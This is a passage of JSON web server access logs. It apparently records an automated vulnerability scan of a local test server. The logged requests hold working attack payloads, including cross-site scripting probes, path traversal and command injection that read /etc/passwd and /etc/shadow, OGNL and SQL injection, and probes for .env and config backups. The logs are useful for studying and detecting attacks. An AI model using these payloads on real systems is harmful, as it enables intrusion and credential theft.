"request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.018","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /data/plugins_listing HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/contact-form-7/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?v=d&p=%22;alert(document.domain);%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"asusrouter--", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gemfile.lock HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage.action?spaceKey=myproj HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"Language_S=../../Data/CONFIG/CasDbCnn.dat","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casmain.xgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /language/lang HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/install.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../29N5EjFZwUQDHMk4Nz63BqRsjF2.txt&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/templates2/viewpagetemplate.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /assets/file:%2f%2f/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/granite/core/content/login/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/edit.php?post_type=wcps&page=import_layouts&keyword=\x22onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29N5EjFZwUQDHMk4Nz63BqRsjF2.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ueditor/php/getRemoteImage.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=cnss_social_icon_page HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0A29N5EjrOm6ZLTLRaY4spLtYlbU0\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22passconf\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22email\x22\x0D\x0A\x0D\x0Atest@29N5EjrOm6ZLTLRaY4spLtYlbU0.tld\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22editid\x22\x0D\x0A\x0D\x0A\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22add\x22\x0D\x0A\x0D\x0Aadd\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22ulevelid\x22\x0D\x0A\x0D\x0A9\x0D\x0A--01b28e152ee044338224bf647275f8eb--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /lib/crud/userprocess.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.dev.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"password=12345","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:09:54 